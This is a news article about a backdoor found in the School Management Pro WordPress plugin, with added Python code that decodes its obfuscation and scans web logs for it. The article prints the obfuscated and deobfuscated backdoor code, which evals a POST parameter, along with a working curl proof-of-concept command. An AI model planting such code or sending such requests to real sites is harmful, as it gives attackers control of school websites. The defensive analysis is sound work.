
Researchers find backdoor lurking in WordPress plugin used by schools – Ars Technica

Summary

Researchers said on Friday that they found a malicious backdoor in a WordPress plugin that gave attackers full control of websites that used the package, which is marketed to schools.

The premium version of School Management, a plugin schools use to operate and manage their websites, has contained the backdoor since at least version 8.9, researchers at website security service Jetpack said in a blog post without ruling out that it had been present …….

Researchers said on Friday that they found a malicious backdoor in a WordPress plugin that gave attackers full control of websites that used the package, which is marketed to schools.

The premium version of School Management, a plugin schools use to operate and manage their websites, has contained the backdoor since at least version 8.9, researchers at website security service Jetpack said in a blog post without ruling out that it had been present in earlier versions. This page from a third-party site shows that version 8.9 was released last August.

Apparent backdoor

Jetpack said it found the backdoor after support team members at WordPress.com reported finding heavily obfuscated code on a number of websites that used School Management Pro. After deobfuscating it, they realized that the code, stashed inside the license-checking part of the plugin, was deliberately placed there with the goal of giving outsiders the ability to take control of websites.

“The code itself isn’t all that interesting: it’s an obvious backdoor injected into the license-checking code of the plugin,” the Jetpack post said. “It allows any attacker to execute arbitrary PHP code on the site with the plugin installed.”


In its obfuscated form, the code looked like this:

}
$_fc = eval("\x65\x76\x61\x6c(\x67\x7a".chr($_x = 0x70 - 7).chr($_x += 5).chr($_x -= 8) . "\x6c\x61\x74" . "\x65\x28\x62"."\x61\x73\x65\x36"."\x34\x5f\x64\x65\x63\x6f\x64\x65\x28'fY9BasMwEEXX8ikmECIbnAukJJAW77ooSaCLUsTYHjsilu2O5JRQfPdKDs2mbbTQQu/9mS8sS4WF010bg2SyTmGvlW61kylUQ3tFCXxFgqnW1hGrSeNucBRHQkg0S0MmJ/YJ2eiCWksy9QSZ8RIUIQ25Y1daCbDewOuL2mX7g9oTn4lXq6ddtj1sH5+zdHILbJoci5MM7q0CzJk+Br8ZpjL+zJFrC+sbWG5qcqpHRmPj5GFydAUxaGvJ+QHBf5N5031W2h7lu5+0WMAMyPTu8i//I303OsGfjoLO2Pzm13JjuMfw6SQS/m304Bs='" . str_repeat(chr(0x29), 3)."\x3b");
class WLSM_Crypt_Blowfish_DefaultKey
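The outer layer above is built from nothing but string-assembly primitives: hex-escaped double-quoted literals, chr() on a running counter, and str_repeat(chr(0x29), 3) for the closing parentheses. The following added example (not from the article or from Jetpack) peels that layer statically, without running any PHP, by interpreting only those primitives, and then scores a source file for the same indicators so that a plugin tree can be triaged. The obfuscated sample it uses is a constructed mimic with a placeholder in place of the base64 payload; the benign sample and the indicator weights are likewise assumptions of this example.

```python
"""Static triage of the obfuscation layer used in the School Management Pro backdoor.

Added example, not the article's or Jetpack's code. It rebuilds the string the
outer eval() receives by interpreting PHP string-building primitives only
(hex-escaped literals, chr() on a running counter, str_repeat), and scores a
PHP source for those indicators.
"""
import re

# Constructed sample mimicking the shape of the obfuscated snippet quoted in the
# article. The base64 payload is a placeholder, not the real blob.
OBFUSCATED_SAMPLE = r"""<?php
$_fc = eval("\x65\x76\x61\x6c(\x67\x7a".chr($_x = 0x70 - 7).chr($_x += 5).chr($_x -= 8) . "\x6c\x61\x74" . "\x65\x28\x62"."\x61\x73\x65\x36"."\x34\x5f\x64\x65\x63\x6f\x64\x65\x28'PAYLOAD_PLACEHOLDER'" . str_repeat(chr(0x29), 3)."\x3b");
"""

# Constructed benign sample for comparison (hypothetical helper, not from the plugin).
BENIGN_SAMPLE = r"""<?php
function wlsm_get_setting( $key ) {
    return get_option( 'wlsm_' . $key, '' );
}
"""

HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")


def decode_php_hex(s):
    """Turn PHP double-quoted \\xNN escapes into the characters they denote."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)


def eval_int_expr(expr):
    """Evaluate a '+'/'-' chain of integer literals such as '0x70 - 7' without eval()."""
    total = 0
    for sign, num in re.findall(r"([+-]?)\s*(0x[0-9A-Fa-f]+|\d+)", expr):
        total += (-1 if sign == "-" else 1) * int(num, 0)
    return total


# Pieces of a concatenation expression, matched left to right as PHP evaluates them.
PIECE = re.compile(
    r'"((?:[^"\\]|\\.)*)"'                                  # double-quoted literal
    r"|'([^']*)'"                                            # single-quoted literal
    r"|chr\(\$\w+\s*(=|\+=|-=)\s*([^)]+)\)"                  # chr() on a running counter
    r"|str_repeat\(chr\((0x[0-9A-Fa-f]+|\d+)\),\s*(\d+)\)"   # repeated single character
)


def reconstruct_eval_argument(src):
    """Rebuild the string that the first eval() in src would receive, or None."""
    start = src.find("eval(")
    if start < 0:
        return None
    counter, out = 0, []
    for m in PIECE.finditer(src[start + len("eval("):]):
        dq, sq, op, val, rep_ch, rep_n = m.groups()
        if dq is not None:
            out.append(decode_php_hex(dq))
        elif sq is not None:
            out.append(sq)
        elif op is not None:
            delta = eval_int_expr(val)
            if op == "=":
                counter = delta
            elif op == "+=":
                counter += delta
            else:
                counter -= delta
            out.append(chr(counter))
        else:
            out.append(chr(int(rep_ch, 0)) * int(rep_n))
    return "".join(out)


# (name, weight, search the decoded+reconstructed text rather than the raw source, pattern)
INDICATORS = [
    ("eval()", 3, True, r"\beval\s*\("),
    ("run of hex escapes in a string", 2, False, r"(?:\\x[0-9A-Fa-f]{2}){4,}"),
    ("chr() driven by a running counter", 2, False, r"chr\(\$\w+\s*(?:=|\+=|-=)"),
    ("gzinflate/gzuncompress", 2, True, r"\bgz(?:inflate|uncompress)\s*\("),
    ("base64_decode", 1, True, r"\bbase64_decode\s*\("),
    ("str_repeat(chr(...))", 1, False, r"str_repeat\(chr\("),
]


def score_php_source(src):
    """Return (score, [indicator names]) for one PHP source text."""
    decoded = decode_php_hex(src) + "\n" + (reconstruct_eval_argument(src) or "")
    hits = [name for name, _, use_decoded, pat in INDICATORS
            if re.search(pat, decoded if use_decoded else src)]
    score = sum(w for name, w, _, _ in INDICATORS if name in hits)
    return score, hits


def is_suspicious(src, threshold=5):
    """Flag a file whose indicator score reaches the (assumed) threshold."""
    return score_php_source(src)[0] >= threshold


if __name__ == "__main__":
    print(reconstruct_eval_argument(OBFUSCATED_SAMPLE))
    for label, sample in (("obfuscated", OBFUSCATED_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, score_php_source(sample), is_suspicious(sample))
```

Run over the constructed sample, the reconstruction yields `eval(gzinflate(base64_decode('PAYLOAD_PLACEHOLDER')));`, which is exactly the shape a responder wants to see before deciding to inflate the inner payload in a sandbox; the scorer is deliberately run on the decoded text as well as the raw source, because names such as gzinflate never appear in clear in the obfuscated layer.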

After deobfuscation, the code was:

add_action( 'rest_api_init', function() {
        register_rest_route(
                'am-member', 'license',
                array(
                        'methods'  => WP_REST_Server::CREATABLE,
                        'callback' => function( $request ) {
                                $args = $request->get_params();
                                if ( isset( $args['blowfish'] ) && ! empty( $args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] ) ) {
                                        eval( $args['blowf'] );
                                }
                        },
                )
        );
} );

Researchers wrote a proof-of-concept exploit that confirmed the obfuscated code was indeed a backdoor that allowed anyone with knowledge of it to execute code of their choice on any website running the plugin.

$ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Warning: Cannot modify header information - headers already sent by (output started .......
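The deobfuscated code registers a route that only runs its eval() on POST requests (WP_REST_Server::CREATABLE), so every POST to /wp-json/am-member/license that reaches a site is an execution attempt, and any other method against the same route is at least a probe. The following added example (not from the article or from Jetpack) runs that detection over web-server access logs in combined format; it also covers the ?rest_route= fallback WordPress uses when pretty permalinks are disabled. The log lines, IP addresses, user agents and the severity labels are constructed for this example.

```python
"""Access-log detection for the am-member/license backdoor route.

Added example, not the article's or Jetpack's code. Flags requests that reach
the REST route the backdoor registers, via the /wp-json/ prefix or the
?rest_route= fallback, and rates POSTs (the only method the route accepts) as
execution attempts.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed combined-format log lines; addresses are from documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [20/May/2022:10:12:01 +0000] "POST /wp-json/am-member/license HTTP/1.1" 200 87 "-" "curl/7.79.1"
198.51.100.7 - - [20/May/2022:10:12:03 +0000] "GET /wp-json/wp/v2/posts?per_page=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [20/May/2022:10:12:09 +0000] "POST /wp-json/am-member/license HTTP/1.1" 200 91 "-" "curl/7.79.1"
198.51.100.9 - - [20/May/2022:10:13:44 +0000] "GET /wp-json/am-member/license/ HTTP/1.1" 404 52 "-" "python-requests/2.27"
198.51.100.9 - - [20/May/2022:10:13:50 +0000] "POST /index.php?rest_route=%2Fam-member%2Flicense HTTP/1.1" 200 88 "-" "python-requests/2.27"
198.51.100.7 - - [20/May/2022:10:14:02 +0000] "GET /wp-content/themes/example/app.js HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

ROUTE = "/am-member/license"


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def targets_backdoor_route(target):
    """True if the request target reaches the am-member/license REST route,
    via the pretty /wp-json/ prefix (any install subdirectory) or ?rest_route=."""
    parts = urlsplit(target)
    path = unquote(parts.path).rstrip("/")
    if path.endswith("/wp-json" + ROUTE):
        return True
    for route in parse_qs(parts.query).get("rest_route", []):
        if unquote(route).rstrip("/") == ROUTE:
            return True
    return False


def classify(entry):
    """Severity for a parsed entry: 'execution' for POST (the only method the
    route accepts, so the eval() runs), 'probe' for other methods, None otherwise."""
    if not targets_backdoor_route(entry["target"]):
        return None
    return "execution" if entry["method"] == "POST" else "probe"


def scan_log(text):
    """Return the alert entries (parsed line plus 'severity') found in the log text."""
    alerts = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        severity = classify(entry)
        if severity:
            alerts.append({**entry, "severity": severity})
    return alerts


def top_sources(alerts):
    """Alerting source addresses with their counts, most active first."""
    return Counter(a["ip"] for a in alerts).most_common()


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(a["severity"], a["ip"], a["method"], a["target"], a["status"])
    print(top_sources(found))
```

A 200 on an execution-severity line means the route existed and answered, so the host should be treated as compromised rather than merely scanned; the same matching logic applies unchanged to a WAF or reverse-proxy rule that blocks POSTs to the route while the plugin is removed or updated.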

Source: https://arstechnica.com/information-technology/2022/05/researchers-find-backdoor-lurking-in-wordpress-plugin-used-by-schools/